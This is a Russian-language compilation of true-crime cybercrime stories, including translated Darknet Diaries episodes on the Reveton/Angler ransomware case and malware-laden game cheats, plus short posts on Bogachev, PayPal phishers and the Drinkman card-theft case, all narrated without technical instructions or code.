Но в то время как группа, создавшая Reveton, была арестована, само программное обеспечение Reveton находилось в руках преступников, таких как Зейн, которые продолжали заражать им людей и использовать его. Хотя это было большим успехом для испанской полиции, которая сократила большую часть этого, Зейна это никак не затронуло. Три месяца спустя, в мае 2013 года, правительство США закрыло Liberty Reserve. Подозреваемый в отмывании более шести миллиардов долларов преступных доходов, он некоторое время находился под следствием. Его владелец, Артур Будовский, был сомнительной личностью, годами скрывавшейся от закона. В 2011 году ему сказали, что ему нужна соответствующая лицензия для ведения бизнеса по переводу денег, но когда его заявление было отклонено, он просто перенес свой бизнес в Коста-Рику. В течение двух лет его операции расследовались полицией, а его средства неоднократно конфисковывались. К концу 2013 года Артур вместе с семью своими сотрудниками находился под стражей, а Liberty Reserve была официально арестована и закрыта.

ПРИТ: Сегодня мы объявляем обвинения в возможно самом крупном международном деле об отмывании денег, которое когда-либо возбуждалось Соединенными Штатами. В частности, мы раскрываем обвинения против Liberty Reserve и семи ее руководителей и сотрудников, которые в течение многих лет управляли одной из самых широко используемых цифровых валют в мире.

Ведущий: Это Прит Бхарара, прокурор США в Нью-Йорке. Liberty Reserve был ключевым звеном в цепочке Зейна и Рэймонда, а также стоящей за ними российской преступной группировки. Без возможности конвертировать выкуп через Liberty Reserve у них возникнут проблемы.

ПРИТ: Liberty Reserve был специально создан и структурирован для облегчения преступной деятельности. По сути, это был банк черного рынка.

Ведущий: Когда Liberty Reserve закрыли, все, у кого на счету были доллары Liberty, сразу их потеряли. Те доллары "Свободы" исчезли, больше не доступны. Какую бы ценность они ни представляли в наличных деньгах, теперь они были потеряны в одночасье. Но теперь, когда сайт оказался в руках властей, следователи начали выяснять, кем были пользователи сайта. Зейн продолжал это делать, но, похоже, на этом участие Рэймонда подошло к концу. На самом деле Рэймонд устроился на работу сетевым инженером в Microsoft, а Microsoft ничего не знала о том, чем Рэймонд занимался в предыдущие годы. Чтобы продолжить, Зейн просто переключился на другую криптовалютную платформу. Падение Liberty Reserve высветило его имя для следственных органов, и большая часть прибыли от мошенничества была раскрыта в последующие годы из данных Liberty.

Власти следили за ниточками и собирали воедино именно то, что задумал Зейн. Поскольку Зейн продолжал покупать рекламные площади, некоторые рекламные компании начали относиться к нему с подозрением. Они будут бросать ему вызов и задавать вопросы, а что Зейн сделает в ответ? Он пытался манипулировать и даже угрожать рекламным агентствам. Он сказал директору одной из компаний, базирующихся в Канаде, цитата: «Правда, лучше, если мы будем работать вместе. Вместе мы сможем заработать серьезные деньги. Это мой путь или нет. K!NG вернулся». Конец цитаты. Когда он не получил желаемого ответа, он последовал еще одной угрозе. Цитата: «Я сначала убью ваш сервер, а затем отправлю вам спам с детской порнографией». Конец цитаты. Затем Зейн запустил распределенную атаку типа «отказ в обслуживании» на эти рекламные сайты, на которых размещалась его реклама. Целью DDoS-атаки было сделать недоступным веб-сайт цели, по сути, вывести его из строя.

Он перегрузил этот веб-сайт и привел к его сбою, что сделало его недоступным для пользователей веб-сайта и, следовательно, для клиентов компании. Зейн использовал свои методы нападения в качестве мести. Это была простая месть. Вы спрашиваете меня? Ты не хочешь пойти со мной на борт? Как ты смеешь. Я заставлю тебя заплатить. Зейн хочет нарушить работу этих агентств, и если он сломает веб-сайт, платящие клиенты не смогут перейти к ним и использовать их веб-сайт для покупки рекламного места. Это основа их бизнеса. Компания теряла кучу денег за каждую секунду отсутствия рекламы. Затем Зейн запустил новые атаки типа «отказ в обслуживании» против веб-сайтов, которые задавали ему вопросы. Опять же, они были против рекламных компаний, которые пытались остановить то, что он делал. DDoS-атаки обходятся этим предприятиям не менее чем в 500 000 фунтов стерлингов, а потери рекламы — в расходах на реагирование на инциденты. Одно из рекламных агентств, подвергшихся нападению, сообщило о Зейне в полицию.

Полиция была отправлена в дом Зейна и арестовала его в июле 2014 года, но через несколько дней его отпустили без предъявления обвинений из-за отсутствия улик. Зейн думал, что перехитрил полицию, но мало ли он знал, отдел киберпреступности Национального агентства по борьбе с преступностью теперь полностью расследовал его. Падение Liberty Reserve было не единственным событием в период активной работы Зейна с программами-вымогателями, которое помешало его операциям. В 2016 году в ходе 86 рейдов в России было арестовано более 50 человек, причастных к кибератаке Lurk на российские банки. Lurk — вредоносное ПО, имитирующее приложение для онлайн-банкинга крупнейшего российского банка Сбербанка. По оценкам, банда, стоящая за Lurk, украла сорок пять миллионов долларов из российских финансовых учреждений менее чем за два года. В середине 2016 года Angler был на пике использования: по оценкам, на него приходилось 40% всех заражений наборами эксплойтов. К этому времени Angler сдавала в аренду преступная группировка, которой он принадлежал.

Любой, кто готов заплатить, мог получить его версию и использовать по своему усмотрению. Было довольно много людей, использующих этот комплект Angler для проведения этих атак программ-вымогателей; Зейн был не единственным. Это распространило комплект по всему миру, и им управляли сотни разных хакеров. Деньги, которые он заработал? Исследователи Cisco Talos считают, что программа-вымогатель Angler приносила хакерам около шестидесяти миллионов долларов в год. Исследовательская группа Cisco Talos изучила это немного глубже и обнаружила связи между Angler и Lurk. Вполне возможно, что при разгоне Lurk они также поймали некоторых хакеров Angler, что могло повлиять на аферу с вымогателями, которую Зейн возглавлял из Великобритании. В начале 2017 года Национальное агентство по борьбе с преступностью Великобритании собрало достаточно улик с серверов Liberty Reserve, чтобы возбудить дело против Зейна.

Полиция снова пришла к Зейну домой и арестовала его. Полиция конфисковала MacBook Pro Зейна и обнаружила журналы, записи и данные. Это связало его с аферой и с тем, что он работал с русскими создателями Angler. Было сохранено более 3000 журналов чатов и почти миллион изображений. Компьютер был зашифрован и работал под управлением как Windows, так и Mac OS. Зейн создал разделы с зашифрованными виртуальными машинами, удаленными серверами и удаленными рабочими столами. Он довольно хорошо скрывал вещи, но это было NCA, и сейчас 2017 год. У них есть целая команда цифровой криминалистики, которая может прочесать все, чтобы собрать улики. Частично причиной падения Зейна были копии панели управления, которую он использовал. Одна из замечательных особенностей Angler и Reveton заключалась в том, что у них были действительно крутые информационные панели, которые показывали вам, сколько заражений было, и где они были, и кто платил, и все такое прочее.

Это присутствовало на его ноутбуке, и он смог войти в него. На одном снимке экрана видно, что Зейн получил доход в размере 14 000 долларов только за июль 2014 года. Было обнаружено несколько финансовых счетов, которые связывали Зейна с использованием различных криптовалют за границей. В феврале 2017 года ему было предъявлено обвинение в шантаже, мошенничестве и неправомерном использовании компьютера. Когда его допросила полиция, Зейн сказал им, что он не участвовал в мошенничестве и что его взломали, но группа цифровой криминалистики смогла опровергнуть это, собрав данные на его компьютере. NCA предоставило несколько примеров расчетов, чтобы продемонстрировать, насколько масштабной была эта операция. По их оценкам, одно рекламное объявление о заражении вредоносным ПО ежемесячно показывалось в двадцати одном миллионе веб-браузеров, при этом Angler загружался примерно на 16 000 компьютеров. Помните, это одно объявление в месяц. Исходя из этого, они подсчитали, что 5%, поэтому около 800 из этих компьютеров не имели современного антивируса, и Англер мог использовать дыры в своих системах и развернуть программу-вымогатель.

Сколько человек обманули? Это почти невозможно узнать, но несколько отчетов об исследованиях безопасности показывают, что в среднем 40% жертв программ-вымогателей платят выкуп. Давайте займемся математикой. У отдельных людей, пострадавших от программы-вымогателя, не было ИТ-отделов, к которым можно было бы обратиться. У них не было людей под рукой, чтобы сообщить им, было ли это мошенничеством или реальным. Сомневаюсь, что большинство людей кому-то рассказали, а если бы и рассказали, то им пришлось бы сказать, что они были на порносайте, когда это всплыло, что смущает, но не то, в чем многие захотят признаться. Я думаю, что процент людей, которые заплатили за эту аферу, намного выше 40%, но давайте понизимся; скажем, только 10% из 800 пользователей, которые столкнулись с экраном программы-вымогателя Reveton, действительно заплатили выкуп. Это восемьдесят жертв, заплативших по 200 долларов каждая. Это приносит Зейну 16 000 долларов в месяц. При показе нескольких рекламных объявлений в месяц вы можете значительно увеличить эти цифры.

Но были расходы, связанные с этой аферой, однако. Не все это было связано с получением прибыли. Зейну пришлось покупать интернет-трафик и делать ставки на рекламные места. Раймонду нужно было платить за отмывание денег, а также комиссию за обмен и перевод. Конечно, не вся прибыль досталась Зейну. Русские тоже получат часть доли. NCA заявило, что за пять лет этой операции Зейн перевел не менее пяти миллионов долларов, используя несколько криптовалютных платформ и онлайн-счетов. Его личная прибыль, по их словам, составляла почти 900 000 долларов на момент его ареста в 2017 году. Тем временем в Южном окружном суде Флориды в марте 2018 года Раймонду было предъявлено обвинение в заговоре с целью отмывания денег.

Рэймонд был связан с платежами и переводами выкупа MoneyPak через Liberty Reserve, и его имя пользователя в сети было Майк Роланд. Ему было предъявлено обвинение в том, что в период с октября 2012 года по март 2013 года он участвовал в отмывании денег, полученных в результате мошенничества с выкупом Реветона. На самом деле это был неудачный перевод 840 долларов между двумя счетами Liberty Reserve, который выдал его. Прокуратура подсчитала, что в течение одного года Рэймонд перевел около 93 000 долларов, полученных от этих платежей с помощью программ-вымогателей. Раймонд обратился в суд и был признан виновным. Судья приговорил его к восемнадцати месяцам тюремного заключения с тремя годами условного освобождения. Он согласился на сделку о признании вины, чтобы снять одно из этих обвинений. Microsoft как-то невольно оказалась втянутой в это дело после того, как наняла Рэймонда, но неудивительно, что они не дали никаких официальных комментариев по этому поводу.

https://i.gyazo.com/48ac3990750ef0ec508cf652e9a8cf88.png

Суд над Зейном в Великобритании был назначен на февраль 2018 года, но был отменен, когда Зейн был разделен в соответствии с Законом о психическом здоровье. Подробности здесь неясны; что-то вроде Зейна положили в больницу в Лондоне на лечение. Но пока там, в больнице, цифровая криминалистика показала, что он все еще занимался мошенничеством с программами-вымогателями и отмыванием денег с использованием больничного Wi-Fi. Его снова арестовали и снова посадили в тюрьму. Эти дополнительные обвинения вызвали изменение заявления Зейна. Теперь он признал себя виновным в общей сложности по одиннадцати пунктам обвинения. Приобретение, владение пользователем преступным имуществом, три пункта обвинения в шантаже, три пункта обвинения в мошенничестве с использованием ложных сведений и четыре пункта обвинения в несанкционированных действиях с намерением нарушить работу компьютера или создать риск серьезного ущерба.

9 апреля 2019 года Зейн Кайзер был приговорен к шести годам и пяти месяцам заключения окружным судом Кингстона. Судья сказал ему, что его дело и его кибератаки были настолько обширными, что не было найдено ни одного сопоставимого дела. То, что сделал Зейн, можно было бы классифицировать как распространенную аферу, которая сейчас называется сексторцией. Они набирают популярность. Они настолько успешны, что преступникам даже не нужно устанавливать программы-вымогатели на ваш компьютер. Иногда достаточно электронной почты. Я имею в виду, представьте, если бы вы получили электронное письмо, в котором говорилось: "Привет, я знаю, что вы ходили на порносайты, а я хакер. Я тайно записал, как ты мастурбируешь на веб-камеру. Пришлите мне биткойны, или я расскажу вашей семье и боссу". Подобные электронные письма становятся обычным явлением. Я получил один на днях, и я проследил его до записи в гостевом блоге, которую я написал на веб-сайте некоторое время назад. Там был мой адрес электронной почты. Эти мошенники удалили мою электронную почту с этого веб-сайта и отправили мне это электронное письмо, ожидая, что я заплачу деньги.

Эти электронные письма пугают, и трудно просить о помощи или знать, что делать. Я почти уверен, что большинство из них — мошенничество, и некоторые попытаются предоставить вам доказательства, показывая вам ваш пароль, но мои слушатели «Дневников Даркнета» достаточно сообразительны, чтобы знать, что существует множество взломов по всему миру, и ваш пароль, вероятно, находится в даркнете вместе с вашей электронной почтой. Просто наличие этого на самом деле не является доказательством чего-либо. Без доказательств чего-либо, что действительно смущает, или каких-либо доказательств, какой у них на самом деле выкуп? Зейн мог бы использовать свои навыки во благо. Он мог быть хакером в белой шляпе. Очевидно, он был очень технически подкован и хорош в рекламе.

Он мог бы защитить компании от подобных угроз и взломов. У него могла бы быть респектабельная карьера, но вместо этого он выбрал этот путь. Он позволил своей жадности и эго расти вместе с ним, что привело его прямо в объятия NCA и ФБР. Хотя он, скорее всего, выйдет из тюрьмы через три года, после этого ему, вероятно, будет трудно найти хорошую работу. Если Зейна выпустят из тюрьмы через три года, ему тогда будет двадцать семь лет. У него будут шантаж, мошенничество, отмывание денег, распространение программ-вымогателей и хакерство в качестве ярлыков, которые будут следовать за ним отныне, и все это ради нескольких лет бесплатных денег. Стоило ли? На это может ответить только Зейн.

Эпизод 28: Чем опасна установка читов

АКТЕР: У нас также есть хейтеры, которые активно нападают на нас, пытаясь обрушить наши читы.

https://i.gyazo.com/31a833c31c5b713177113baef7749611.jpg

Ведущий: Что ты имеешь в виду?

АКТЕР: Например, наши конкуренты, другие мошенники. Итак, мы получаем DDoSsed, и наш сайт падает, а затем нам приходится тратить больше денег на предотвращение DDoS и платить за дополнительную пропускную способность, когда это происходит.

Ведущий: Хорошо, теперь понятно, почему вы просите три формы удостоверения личности, прежде чем давать кому-то свои читы: вы не хотите, чтобы ваши читы попали в чужие руки, потому что, если это произойдет, это может очень быстро сделать их непригодными для использования.

АКТЕР: Точно.

Ведущий: Итак, ты когда-нибудь пробовал сам покупать читы?

ЕВГЕНИЙ: Конечно.

Ведущий: Насколько успешно?

ЕВГЕНИЙ: Довольно успешно. Итак, с публичными все довольно просто. Первое, что нам нужно реализовать, — это своего рода программа вознаграждения за обнаружение ошибок и возможность покупать читы. Итак, мы создали полностью физически отдельную сеть внутри компании, у которой есть отдельное сетевое подключение к интернету, и мы использовали ее, по сути, как отдельную лабораторию, где мы покупали читы и разбирали их. Итак, в основном в этом пространстве у нас была пара человек, работавших над этим, например, реверс-инженер и менеджер сообщества, которые пытались купить читы, быть или выдавать себя за людей, которые ищут чит как публично, так и в частном порядке. Много раз это было похоже на перевод ******, я думаю, что что-то было даже с криптовалютой и так далее. Так что вообще, в основном, альтернативные способы оплаты. Мы хотели бы, чтобы этот человек искал эти публичные и частные читы, пытался получить их как можно больше, и оба предоставляли их анти-читерской программе, которую мы использовали, и, если возможно, также использовали наш собственный обратный инжиниринг, чтобы вычислить как они ломают игру.

Этот процесс покупки чита был простым для общественности, если вы не давали понять, что вы из компании, например, используя имя разработчика и так далее, потому что они заблокируют эти учетные записи. Но когда дело доходит до приватных банов, иногда это означает, что вам нужно будет вести мгновенный разговор в Skype, ICQ, IRC, VK, Facebook, где угодно, или на форумах, через их специальные каналы или специальный веб-сайт, и я — у нас даже есть случаи, когда люди просили удостоверения личности, чтобы подтвердить личность покупателя, особенно если некоторые из этих супер-частных, где они продают, например, до десяти, двадцати, тридцати человек, и просили очень значительную подписку, например, 200, 500 долларов. , потому что мы видели даже такие, где люди готовы платить 500 долларов, чтобы иметь приватный чит, который только для них. Это то, что они хотят делать, и есть разработчик, к которому они обращаются, если что-то пойдет не так, и они исправят это за них. Итак, выдавая себя за разных пользователей, несколько учетных записей, несколько отдельных сетей, которые мы использовали, и просто присутствуя на всех этих каналах, где происходили бартеры и сделки.

Ведущий: Но это не так просто, как просто притвориться кем-то другим, чтобы купить эти читы. Загрузка и запуск чита в игре также является очень деликатным процессом, с которым разработчики игры должны быть осторожны, потому что создатели читов наблюдают за этой частью. Итак, как работает ваш чит? Если я купил его, какие шаги мне нужно сделать, чтобы заставить его работать?

АКТЕР: У нас есть погрузчик. Сначала вы запускаете загрузчик, а затем он запускает настоящую игру. Это своего рода оболочка для игры, поэтому все входящие и исходящие пакеты проходят через этот загрузчик. Вся память также доступна на загрузчике. Загрузчик манипулирует данными, чтобы заставить чит работать.

Ведущий: Хорошо, я понял, но есть ли функция входа в загрузчик? Как узнать, что моя подписка закончилась?

АКТЕР: Мы используем лицензионные ключи. Когда вы запускаете загрузчик, вы вводите лицензионный ключ, и это делает чит действительным в течение этого количества дней.

Ведущий: Пообщавшись с продавцом читов, они сказали мне, что есть также способы идентифицировать машину, на которой работает загрузчик, и ключ привязывается к идентификатору этой машины, так что это может быть комбинация имени хоста, Mac адрес, IP-адрес или другие идентификаторы. Это также означает, что вы не можете поделиться читом с другими; он будет работать только на первой машине, на которой вы его установите. Теперь давайте остановимся здесь на секунду и поймем, насколько отчаянно некоторые люди хотят получить эти читы. Платить 30 долларов за использование чита в течение семи дней достаточно дорого, если вы спросите меня. Но вдобавок ко всему, вы должны предоставить веб-сайту три формы идентификатора, а затем вы загружаете, устанавливаете и запускаете программу с теневого, подпольного хакерского веб-сайта. Тот, кто покупает этот материал, действительно должен игнорировать несколько красных флажков, чтобы заставить его работать, и некоторые мошенники видят это и пользуются этим.

ЕВГЕНИЙ: Тебе стоит заглянуть в AimKit.

Ведущий: Хорошо, AimKit. Это был чит для игры Rust, за использование которого нужно было платить 40 долларов в месяц, и игроки сообщали, что этот чит никогда нельзя было обнаружить, то есть BattlEye мог легко обнаружить его, если вы использовали этот чит, и забанить вас. Итак, начнем с того, что AimKit не был качественным читом. Вы покупаете его, вы используете его, вас банят, и это не то, как вы хотите, чтобы ваш читерский опыт прошел. Хорошие читы остаются незамеченными. В любом случае, когда пользователи начали жаловаться на этот чит, другие пользователи тоже начали звонить, говоря, что после его установки их учетные записи Discord были заблокированы. Предположительно, загрузчик не только предоставлял чит, но и брал кое-что с того компьютера, на котором он был установлен, и отправлял его обратно разработчикам в AimKit, например, логины Discord и кто знает что еще. Предположительно, разработчики AimKit использовали эти логины Discord для каких-то действий. Я предполагаю спам-каналы или людей, и это привело к тому, что человек был забанен в Discord. Но это всего лишь один пример игрового чита, который на самом деле представлял собой вредоносное ПО, крадущее информацию о пользователе и причиняющее ему вред. Но есть гораздо хуже, чем это. Юджин говорит, что когда он покупает эти читы, он всегда ожидает, что это вредоносное или какое-то шпионское ПО, поэтому ему приходится принимать дополнительные меры предосторожности при их установке.

ЕВГЕНИЙ: Ну, приложение, которое он нам прислал, — оно было, конечно, в отдельной сети физически и столько защиты, сколько мы могли применить внутри компании, но то, что приложение, которое мы прислали, загрузило все файлы базы данных Skype и отправь парню. Когда он просматривал эти файлы данных Skype, он мог сказать, что это были, например, мы, разработчики, да? Поэтому, как только он присылал нам что-то, что не работало, и мы начинали жаловаться, что это не работает, он сразу же закрывал сообщение, потому что выяснял, что мы разработчики. Таким образом, они идут к действительно чрезвычайной осторожности.

Ведущий: Подождите, вы хотите сказать, что, когда вам присылают загрузчик или чит, чит на самом деле просматривает другие данные на вашем компьютере, чтобы подтвердить, кто вы?

ЕВГЕНИЙ: Да, да. Он заражает как вредоносное ПО ваш компьютер.

Ведущий: Знаете что? Я должен был ожидать этого, на самом деле. Я помню, как скачивал игры, когда был подростком, с сомнительных сайтов, и половина из них содержала вредоносное ПО. Почему я должен ожидать, что сегодня все будет по-другому, даже если я плачу за это? Загрузка любого исполняемого файла с сомнительного веб-сайта никогда не будет хорошей идеей. Вот почему, когда разработчики видеоигр получают чит, они помещают его на новый компьютер, на котором нет никаких конфиденциальных файлов, в отдельной сети, потому что разработчики читов следят за тем, кто использует их чит. Но это также мешает разработчикам игр делиться читом с командой разработчиков или BattlEye, поскольку они не могут отправить этот чит кому-то еще. На другом компе работать не будет.

Таким образом, разработчики игр должны настроить удаленный рабочий стол, чтобы другие люди могли заходить на эту машину и анализировать ее или устанавливать ее на виртуальную машину. Юджин также говорит мне, что иногда люди из чит-сообщества выходят вперед и просто дают им чит, часто через свою программу вознаграждения за ошибки, но иногда нет. Иногда им просто присылают рабочий исполняемый файл, в котором есть чит, явно что-то, что этот человек купил, но не разрабатывал, и они готовы поделиться этим с разработчиком игры. Я думаю, что здесь происходит то, что это может быть борьба между другими разработчиками читов, когда, если один поставщик читов хочет разрушить бизнес для другого поставщика читов, они могут просто купить чит, а затем передать его разработчику игры, который затем исправит это сделать, чтобы этот чит не работал, а это значит, что больше людей покупают работающий.

ЕВГЕНИЙ: Так что да, можно сказать, что у нас были оба вида подходов, чтобы иметь двойного агента на другой стороне и людей из сообщества, мошеннического сообщества, которые действовали бы для нас как двойные агенты, фактически предоставляя нам дополнительную информацию или непосредственно исполняемые файлы определенного чита, который был приватным, и так далее.

Ведущий: Боже, это безумие, да? Быть разработчиком игр сегодня означает, что вам, возможно, придется изображать из себя двойного агента, действующего как мошенник, чтобы получить некоторые читы, или вам, возможно, придется работать с двойными агентами, которые находятся в сообществе читов, но хотят разоблачить кого-то. Происходит сумасшедшая битва, и иногда все это становится личным. Во всем этом много эмоций, верно? Я имею в виду, что для того, чтобы чит-разработчик сделал чит, он, вероятно, уже любит игру и знает ее очень хорошо, и они хотели бы разработать дополнительную функцию в игре. Итак, они садятся и пытаются манипулировать внутриигровыми данными, пытаясь найти что-то, что дает им преимущество, и на это могут уйти недели. Но когда они это сделают, должно быть здорово, что вы перехитрили создателей игр. Они должны чувствовать, что знают об игре то, чего не знают даже разработчики. Так что, держу пари, после того, как они находят новый чит, начинается небольшой праздник. Конечно, получать за это деньги тоже приносит массу новых эмоций, верно? Дофамин точно бьет. Но затем все это рушится, когда игровая студия обнаруживает это и исправляет. Теперь тот кайф, который был у разработчиков читов, уходит, и они могут разозлиться. Они могут захотеть узнать, кто именно был разработчиком игры, который испортил вечеринку, найти его имя и начать оскорблять его в Твиттере. Теперь здесь все становится некрасиво.

ЕВГЕНИЙ: Мы очень сблизились с этими людьми, и под близкими я подразумеваю их – постепенно они как бы доксировали нас и получили наши номера телефонов и личные аккаунты. Я думаю, что они так и не проникли ни в один из моих аккаунтов, потому что большинство из них были под двухфакторной аутентификацией, но я думаю, что они, по крайней мере, пытались. Благодаря этим связям с этими людьми я встретил много разных странных персонажей.

Ведущий: Евгений говорит, что собирался выступить с докладом о читерах на GDC, конференции разработчиков игр, и, очевидно, читеры начали кампанию GoFundMe по сбору денег — на что они собирались собирать деньги?

ЕВГЕНИЙ: Чтобы можно было оплатить билеты на GDC, прийти на презентацию и потроллить меня там, в общем.

Ведущий: Ну, он выступал на конференции, и троллей в зале не было. Но он был доксирован, и у него было много неверных попыток входа в систему, а также всевозможные странные сообщения и угрозы.

ЕВГЕНИЙ: Больше всего я ненавидел жуткие звонки. Я брал трубку, и поскольку это мой рабочий телефон, и звонит неизвестный номер, я обычно беру трубку, потому что это может быть любой из наших партнеров, и мне говорят эти странные вещи или люди, связывающиеся с членами моей семьи. , посылая им странные, кровавые фотографии. Это просто раздражало; например, почему вы делаете — например, почему вы нацелились на члена моей семьи? Я, черт возьми, не понимаю. Мол, ладно, беспокой меня в Instagram, беспокой меня в Твиттере, беспокой меня в чертовом мессенджере и присылай мне странную чушь. Только не звони мне, не мешай окружающим; это было бы чудесно. Таким образом, это как бы побудило меня быть более осторожным в отношении многих моих социальных сетей. Я не использую их так часто, как раньше. Просто все закрыто.

Ведущий: Это просто дико, что и разработчики игр, и разработчики читов подвергаются нападкам в этом пространстве. Странная параллель с самой игрой. В игре происходят сражения, симулированные бои, но вне игры тоже происходит совершенно другая битва, и ставки здесь намного выше.

https://i.gyazo.com/f12b01186706ac4d3ca802919cc7c4e4.jpg

Вступить в наш чат

Евгений Богачев — человек, названный самой большой угрозой для банковской системы Америки. Под кодовым именем «Lucky 12345» он осуществлял свои операции, сидя в кресле в своём собственном доме на черноморском побережье России. Он руководил тем, что считается самой изощренной сетью киберпреступности, которую когда-либо видел мир.

https://i.gyazo.com/02fd2ad62d43839ac77761527586fbbd.png

Используя «вредоносное ПО» 30-летний мужчина и его банда взломали сотни тысяч банковских счетов, опустошая до 7 миллионов долларов за раз.

Большинство жертв даже не подозревали о том, что их компьютеры ежедневно подвергались атакам со стороны программы под названием GameOver Zeus.

«Программа-вымогатель» замораживала компьютерные файлы жертв и угрожала уничтожить их, если не будет выплачен выкуп. Они были нацелены не только на крупные предприятия, но и на домашние компьютеры, замораживая семейные фотографии и школьные проекты детей. Одной из жертв стал полицейский участок в Массачусетсе, которому пришлось заплатить, чтобы получить свою базу данных фотографий.

За информацию о Богачеве FBI предлагает рекордную награду в $3 млн. По некоторым данным хакер все еще находится на свободе в России, где официальные лица не проявляют особого интереса к помощи ФБР после санкций, введенных против Москвы из-за Крыма.

https://i.gyazo.com/4574d67ecec586f5457f66e922c3ffc0.png

Богачева прославляют как героя в его родном городе Анапе, морском курорте в 70 милях от Крыма. Используя детали обвинительного акта США, раскрытого против него, британская газета посетила его адрес на Лермонтова 120, в небоскребе с квартирами стоимостью 250 000 долларов за штуку, где его видели в последний раз.

Там соседи помнят тихого человека, который плавал на катере и чье единственное участие в киберактивности было наклейкой на бампере его стареющей машины, которая рекламировала его услуги по «ремонту компьютеров». Однако, когда соседям рассказали, что теперь Евгений стал врагом общества номер один в США, многие пришли в восторг. «Какой талантливый парень», — сказал 23-летний Михаил, который узнал на фотографии Богачева, сделанной ФБР, человека, которого он видел в подъезде с женой и девятилетней дочерью.

ФБР, описав GOZ как «самую изощренную» кибераферу и назвало сумму дохода с программы как минимум в 15 миллионов долларов в месяц. До сих пор официальные лица США считают, что Кремль вступил в сговор с ведущими российскими хакерами в обмен на помощь в разработке кибервойны.

«Маловероятно, что между государственными и негосударственными кибератаками не было сотрудничества», — сказал Кеннет Джирс, военный компьютерный эксперт США, который сейчас работает в фирме FireEye, занимающейся интернет-безопасностью.

https://i.gyazo.com/5953b0a8efc7c0e294b58bfe12215975.png

Газета New York Times «Золотому» хакеру также приписывает сотрудничество с разведкой. Источники газеты полагают, что российская разведка использовала хакера, чтобы проникать в системы чиновников и военных ведомств. NYT утверждает, что больше всего разведку интересовали документы под грифом «совершенно секретно», а также информация о военных конфликтах на Украине и в Сирии.

Богачеву предъявлено множество обвинений, но шансов на его поимку нет. Находясь в международном розыске уже более 7 лет, талантливый хакер не оставил и следа.

https://i.gyazo.com/9e89c6e06bbeaf14d19f12be2397f59d.jpg

Вступить в наш чат

Сегодня вспомним историю об одних из самых популярных и успешных, но не самых аккуратных и очень доверчивых русских хакеров, ограбивших РауРаl.

В конце 2000 года ФБР обманом заманило в США двух хакеров из Челябинска, после того, как мошенники появились в стране их очень быстро арестовали. Речь пойдет в двух русских хакеров, которых США объявило в розыск и обвинило во многих кибератаках, — 20-летний Алексей Иванов и 25-летний Василий Горшков.

https://i.gyazo.com/b19bbf6ef01178f07e758fb613004dde.png

При задержании у мошенников обнаружили файл с номерами 38 тысяч кредитных карт пользователей РауРаl.

Ребята работали в огромных масштабах, используя простой фишинг. Однако важно помнить, о каком времени мы говорим — в нулевых стационарные компьютеры только начали появляться и осведомленность граждан была очень слабой.

Чтобы завладеть личной информацией пользователей, хакеры создавали страницы, точную копию официального сайта популярной платежной системы РауРаl. Представитель РауРаl признался, что на протяжении нескольких лет в сети существовали такие «зеркала», но не стал сообщать точную информацию о похищении денежных средств. В то время у руля РауРаl ещё был Илон Маск.

https://i.gyazo.com/b4ac3d0723ca46dab719938909036c68.png

Интересна была и операция по поимке челябинских хакеров. Во-первых, ФБР создали фиктивную компанию Invita. Отдельно стоит отметить, что уже на этом этапе операция могла провалиться, ведь по-английски «invite» означает «приглашать».

Далее ФБР под видом частной компании связалось с подозреваемыми и попросило их продемонстрировать фирме свои навыки. Талантливые хакеры успешно взломали Invita, а затем компания предложила работать на них.

Когда Иванов и Горшков в ноябре 2000 года приехали в США и пришли в офис компании, в качестве тестового задания им было необходимо выполнить взлом. Однако сделать это нужно было на компьютере ФБР, где уже стояли всевозможные трекеры, которые, в том числе считывали логины и пароли. После того, как ничего не подозревающие хакеры взломали что-то на глазах у ФБР, их арестовали.

https://i.gyazo.com/6d2099266a5fc5836c95b43868bb3f16.png

Многие уверены, что Иванов и Горшков — лишь часть большой преступной группировки, и их арест послужит предостережением для российских хакеров.

Горшков получил срок в 4 года американской тюрьмы. А его товарищ Иванов сам признал себя виновным и провел в заключении три года и восемь месяцев.

После отбывания срока хакеры не давали комментариев и предпочли быть более аккуратными в интернете. Однако Горшков решил пойти путем праведным и стать слугой народа — в 2016 году появилась информация о неожиданном включении хакера с американской судимостью в челябинский облизбирком.

https://i.gyazo.com/64dc7797579cd855c8d73b0a9a3b48ed.png

https://i.gyazo.com/01391f0cdcf72b74b557c9b06f26cb96.png

https://i.gyazo.com/7c17220aeab09443508308479ce0972f.jpg

Вступить в наш чат

Владимир Дринкман – уроженец Сыктывкара, окончил в столице Коми школу № 1, учился в Сыктывкарском госуниверситете. 14 февраля 2018 года американский судья приговорил россиянина к 12 годам тюремного заключения за его участие в хакерской схеме, которая, по словам ФБР, нанесла ущерб в сотни миллионов долларов за счет продажи 160 миллионов украденных номеров кредитных карт.

Владимира Дринкмана арестовали в Амстердаме в июне 2012 года и экстрадировали в США в феврале 2015 года.

https://i.gyazo.com/ff2da689bd615ffea4b3405d83655bcb.png

Дринкман был обвинен и признал себя виновным по нескольким статьям: сговор с целью незаконного доступа к компьютерам и сговор с целью мошенничества с использованием электронных средств связи.

Впервые на радарах ФБР Владимир появился еще в 2003 году, когда участвовал в мошеннических схемах. Тогда он устанавливал на устройства «снифферы», предназначенные для кражи данных из компьютерных сетей финансовых компаний, платежных систем и розничных продавцов.

Далее Дринкман сохранял украденные данные и продавал заинтересованным. За каждую кредитную карту он получал от 10 до 50$, а таких данных у него было очень много.

https://i.gyazo.com/e87a3f9661fdac0d7d35897c8e7fa51c.png

Хакерская схема обошлась банкам и компаниям очень дорого. Банки, выпускающие кредитные карты, обеднели на сотни миллионов долларов. Одна компания заявила о убытке в более чем 300 миллионов долларов. Всего о кражах сообщили только три компании, но число пострадавших составляет несколько десятков.

По официальным данным ФБР, Дринкман смог проникнуть в сети шестнадцати компаний, в том числе Nasdaq OMX Group Inc, 7-Eleven, французской Carrefour SA, JC Penney Co, JetBlue Airways Corp и Heartland Payment Systems Inc.

https://i.gyazo.com/56574e8529574aaf1e3085f0ab9f026d.png

Отдельно стоит рассказать о том, как попался Владимир. Его поездка в Амстердам оказалась слишком дорогой. В следующем выпуске расскажем о легендарной схеме Дринкмана и его подельниках, а также подробнее о его поимке.

https://i.gyazo.com/3c9c6320d2f3fa88dd217424e435884f.png

Дринкман сейчас

https://i.gyazo.com/16c675c43f671f8905b189e64128624a.jpg

Вступить в наш чат

